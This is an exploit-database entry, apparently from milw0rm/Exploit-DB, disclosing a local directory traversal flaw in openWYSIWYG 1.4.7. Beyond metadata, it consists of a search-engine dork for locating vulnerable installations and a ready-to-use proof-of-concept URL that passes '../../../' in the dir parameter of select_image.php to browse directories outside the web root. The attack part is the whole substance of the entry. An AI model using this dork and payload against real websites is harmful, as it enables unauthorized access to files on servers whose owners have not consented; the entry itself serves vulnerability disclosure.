openWYSIWYG 1.4.7 - Local Directory Traversal

Author: StAkeR
type: webapps
platform: php
port: 
date_added: 2009-05-10  
date_updated:   
verified: 1  
codes: OSVDB-54682  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 8654.txt  

[--- openWYSIWYG <= 1.4.7 Local Directory Transversal Vulnerability ---]

[-- Discovered by Juri Gianni aka yeat - staker[at]hotmail[dot]it --]
[-- Visit http://zeroidentity.org --]
[-- allinurl: addons/imagelibrary/select_image.php --]

http://[target]/[path]/addons/imagelibrary/select_image.php?dir=../../../

# milw0rm.com [2009-05-11]